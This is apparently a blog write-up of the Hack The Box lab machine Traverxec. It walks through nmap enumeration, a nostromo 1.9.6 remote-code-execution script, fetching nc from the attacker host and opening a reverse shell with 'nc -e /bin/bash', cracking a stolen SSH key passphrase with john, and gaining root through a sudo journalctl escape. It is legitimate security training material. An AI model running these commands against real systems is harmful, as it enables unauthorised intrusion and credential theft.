Commands used
1-nmap -sC -sV -O -v -oA initial 10.10.10.4
2-python getshell.py 10.10.10.165 80 "cd / && mkdir tmp"
3-python getshell.py 10.10.10.165 80 "cd /tmp && wget http://10.10.14.20:8000/nc"
4-python getshell.py 10.10.10.165 80 "/tmp/nc -e /bin/bash 10.10.14.20 4444"
5-cd /home/david/public_www
6-base64 backup-ssh-identity-files.tgz
7-base64 -d file >>new file
8-/usr/share/john/ssh2john.py id_rsa
9-john hash --wordlist=/root/Desktop/rockyou.txt
10-ssh -i id_rsa [email protected]
11-/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
12-!/bin/bash
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-00-24-13-1024x356.png)
Steps invloved
1-Enumeration
2-Exploiting nostromo 1.9.6
3-Getting a complete shell
4-Getting id_rsa for User David
5-Getting keyprase for id_rsa
6-Getting user.txt
7-Exploiting journalctl (Getting root.txt)
Enumeration
Nmap scan
Nmap 7.70 scan initiated Thu Apr 9 21:41:24 2020 as: nmap -sC -sV -O -p- -v -oV 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.28s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 | http-methods: | Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 45.541 days (since Mon Feb 24 07:47:21 2020)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Thu Apr 9 21:46:56 2020 -- 1 IP address (1 host up) scanned in 333.39 seconds
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-21-58-51-1024x400.png)
The first thing which is very uncommon is the version of the http nostromo
So lets google about it and try to find some exploits of it.
Exploiting nostromo 1.9.6
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-22-56-49-1024x229.png)
On the top i got rapid 7 cve hence i used that can copied it my machine as getshell.py.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-22-59-38.png)
Getting a complete shell
This is a one line shell so lets first get a full shell.
Through this i uploaded nc to the target and then started reverse shell .
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-02-27-1024x528.png)
Before executing this make sure you have your python server on.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-03-37.png)
root@nagendra:~/Desktop/htb/traverxec# python getshell.py 10.10.10.165 80 "cd /tmp && chmod +x nc"
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-05-35-1024x313.png)
Hence now we have a full shell as www user
Getting id_rsa for User David
After a little enumeration i found a conf file
MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin [email protected]
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
LOGS [OPTIONAL]
logpid logs/nhttpd.pid
SETUID [RECOMMENDED]
user www-data
BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
ALIASES [OPTIONAL]
/icons /var/nostromo/icons
HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
So there is a directory public_www in david so lets check that
cd /home/david/public_www
ls
index.html
protected-file-area
cd protected-file-area
ls
backup-ssh-identity-files.tgz
base64 backup-ssh-identity-files.tgz
Found a backup file lets download it using base64
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-18-11.png)
Then copying that in file and then decoding it.
base64 -d file >>new file
after extracting it i got id_rsa key for david.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-21-16.png)
Getting keyprase for id_rsa
In order to get the key prase of it .First i had to convert it into hash.Using ssh2john
locate ssh2john
in order to find it in your machine.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-24-15-1024x246.png)
Now lets decrypt it using john the ripper.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-25-42.png)
Getting User.txt
Now Simply login in ssh and get the user flag.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-27-13.png)
Exploiting journalctl (Getting root.txt)
Now let’s do privilege escalation .
Found a server-stats.sh
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-00-04-09.png)
david@traverxec:~/bin$ cat server-stats.sh
!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load:/usr/bin/uptime
"
echo " "
echo "Open nhttpd sockets:/usr/bin/ss -H sport = 80 | /usr/bin/wc -l
"
echo "Files in the docroot:/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l
"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Used gtfobins for exploiting this binary.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2020-04-09 19:07:20 EDT, end at Fri 2020-04-10 00:11:15 EDT. --
Apr 09 19:07:25 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 09 19:19:00 traverxec sudo[760]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=ww
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): conversation failed
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 09 19:19:03 traverxec sudo[760]: www-data : command not allowed ; TTY=pts/0 ; PWD=/home/david ; USER=root ; COMMAND=list
!/bin/bash
root@traverxec:/home/david/bin# whoami
root
root@traverxec:/home/david/bin# cd /
root@traverxec:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@traverxec:/# cd root
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt
9##################6e0d906
root@traverxec:~#